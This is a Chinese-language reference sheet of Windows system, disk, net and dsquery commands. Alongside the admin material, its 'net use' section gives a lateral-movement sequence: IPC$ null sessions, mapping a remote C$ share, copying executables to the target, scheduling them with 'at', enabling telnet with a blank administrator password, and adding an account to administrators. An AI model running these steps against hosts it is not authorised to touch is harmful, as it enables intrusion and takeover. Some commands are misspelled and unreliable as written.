Windows系统命令
1.系统指令
| 序号 | 命令 | 描述 |
|---|---|---|
| 1 | wmic diskdrive | 查看磁盘驱动,品牌,读写状态 |
| 2 | wmic logicaldisk | 查看磁盘逻辑分区 |
| 3 | wmic volume | 查看磁盘分区的信息 |
| 4 | wmic cpu | 查看CPU信息 |
| 5 | wmic memorychip | 查看内存信息 |
| 6 | wmic bios | 查看BIOS信息 |
| 7 | systeminfo | 系统信息查询 |
2.常用命令
2.1系统命令
| 序号 | 命令 | 描述 |
|---|---|---|
| 1 | calc | 计算器 |
| 2 | mstsc | 远程桌面连接 |
| 3 | msconfig | 系统配置 |
| 4 | regedit | 注册表编辑 |
| 5 | gpedit.msc | 本地组策略编辑器 |
| 6 | winver | 查看系统版本 |
| 7 | notepad | 打开记事本 |
| 8 | dxdiag | DirectX信息查看 |
| 9 | nslookup | ip地址侦测器,监测网络中DNS服务器是否能正确实现域名解析的命令行工具 |
| 10 | shutdown | 60秒关机倒计时 |
| 11 | lusrmgr.msc | 本地用户和组 |
| 12 | services.msc | 本地服务设置 |
| 13 | compmgmt.msc | 计算机管理 |
| 14 | diskmgmt.msc | 磁盘管理实用程序 |
| 15 | devmgmt.msc | 设备管理器 |
2.2磁盘命令
| 序号 | 命令 | 描述 |
|---|---|---|
| 1 | diskpart | 磁盘分区程序 |
| 2 | list disk | 列出挂载的磁盘 |
| 3 | list volume | 列出分区 |
| 4 | select disk 0 | 选择0磁盘,磁盘根据list dist确定编号 |
| 5 | list partition | 列出当前磁盘分区情况 |
3.net命令
1、Net View
作用:显示域列表、计算机列表或指定计算机的共享资源列表。
命令格式:
**Net view [\\computername | /domain[:domainname]]**
有关参数说明:
·键入不带参数的Net view显示当前域的计算机列表
·\computername 指定要查看其共享资源的计算机
·/domain[:domainname]指定要查看其可用计算机的域
例如:Net view \GHQ查看GHQ计算机的共享资源列表。
Net view /domain:XYZ 查看XYZ域中的机器列表。
2、Net User
作用:添加或更改用户帐号或显示用户帐号信息。
命令格式:
Net user [username [password | *] [options]] [/domain]
有关参数说明:
·键入不带参数的Net user查看计算机上的用户帐号列表
·username添加、删除、更改或查看用户帐号名
·password为用户帐号分配或更改密码
·提示输入密码
·/domain在计算机主域的主域控制器中执行操作。该参数仅在 Windows NT Server 域成员的 Windows NT Workstation 计算机上可用。默认情况下,Windows NT Server 计算机在主域控制器中执行操作。注意:在计算机主域的主域控制器发生该动作。它可能不是登录域。
例如:Net user ghq123查看用户GHQ123的信息。
命令:
/add 添加用户
/delete 删除用户
/domain 指定在域控中执行
/active:{yes | no} 是否激活,默认是
/comment:”text” 为账户设定描述信息
/expires:{date | never} 设定过期时间,比如说net user abc /expires:2020/1/1
/homedir:{directory} 指定用户的家目录
/passwordchg:{yes | no} 是否允许用户自己更改密码,默认是
/passwordreq:{yes | no} 指定用户是否必须设置密码,默认是
/profilepath[:path] 指定用户配置文件路径
/scriptpath:[:filename] 用户登录脚本位置
/times:{times | all} 指定用户可以登录的时间,比如说net user abc /times:M-W,8:00-12:00
/usercomment:”text” 使管理员可以更改此账户的描述信息
/workstations:{computername[,…] | * } 指定主机名能够登录此账户
3、Net Use
作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。
命令格式:
Net use [devicename | ] [\computername\sharename[\volume]] [password|]][/user:[domainname]username][[/delete]| [/persistent:{yes | no}]]
有关参数说明:
·键入不带参数的Net use列出网络连接
·devicename指定要连接到的资源名称或要断开的设备名称
·\computername\sharename服务器及共享资源的名称
·password访问共享资源的密码
· * 提示键入密码
·/user指定进行连接的另外一个用户
·domainname指定另一个域
·username指定登录的用户名
·/home将用户连接到其宿主目录
·/delete取消指定网络连接
·/persistent控制永久网络连接的使用。
例如:Net use f: \GHQ\TEMP 将\GHQ\TEMP目录建立为F盘
Net use f: \GHQ\TEMP /delete 断开连接
1)建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
net use \\IP\ipc$ "密码" /user:"用户名" (同样有3个空格)
3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
4)删除一个ipc$连接
net use \\IP\ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
3 查看远程主机的共享资源(但看不到默认共享)
net view \\IP
4 查看本地主机的共享资源(可以看到本地的默认共享)
net share
5 得到远程主机的用户名列表
nbtstat -A IP
6 得到本地主机的用户列表
net user
7 查看远程主机的当前时间
net time \\IP
8 显示本地主机当前服务
net start
9 启动/关闭本地服务
net start 服务名 /y
net stop 服务名 /y
10 映射远程共享:
net use z: \\IP\baby
此命令将共享名为baby的共享资源映射到z盘
11 删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del /y删除全部
12 向远程主机复制文件
copy \路径\srv.exe \\IP\共享目录名,如:
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内
13 远程添加计划任务
at \\ip 时间 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径
14 开启远程主机的telnet
这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就该ntlm认证
4)对WIN2K/XP有效,NT未经测试
命令格式:OpenTelnet.exe \\server account psw NTLM认证方式 port
试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90
15 激活用户/加入管理员组
1 net uesr account /active:yes
2 net localgroup administrators account /add
16 关闭远程主机的telnet
同样需要一个小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \\server account psw
试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""
17 删除一个已建立的ipc$连接
net use \\IP\ipc$ /del
4、Net Time
作用:使计算机的时钟与另一台计算机或域的时间同步。
命令格式:Net time [\computername | /domain[:name]] [/set]
有关参数说明:
·\computername要检查或同步的服务器名
·/domain[:name]指定要与其时间同步的域
·/set使本计算机时钟与指定计算机或域的时钟同步
5、Net Localgroup
作用:添加、显示或更改本地组。
命令格式:
Net localgroup groupname {/add [/comment:"text "] | /delete} [/domain]
有关参数说明:
·键入不带参数的Net localgroup显示服务器名称和计算机的本地组名称
·groupname要添加、扩充或删除的本地组名称
·/comment: "text "为新建或现有组添加注释
·/domain在当前域的主域控制器中执行操作,否则仅在本地计算机上执行操作
·name [ ...]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名
·/add将全局组名或用户名添加到本地组中
·/delete从本地组中删除组名或用户名
例如:Net localgroup ggg /add 将名为ggg的本地组添加到本地用户帐号数据库;
Net localgroup ggg 显示ggg本地组中的用户。
6、dsquery server
dequery server -domian super.com 查询super.com域中的域控服务器
dequery subnet 查询域内子网
dsquery group 查询域内用户组
dsquery ou 查询域内组织单位
dsquery site 查询域内站点
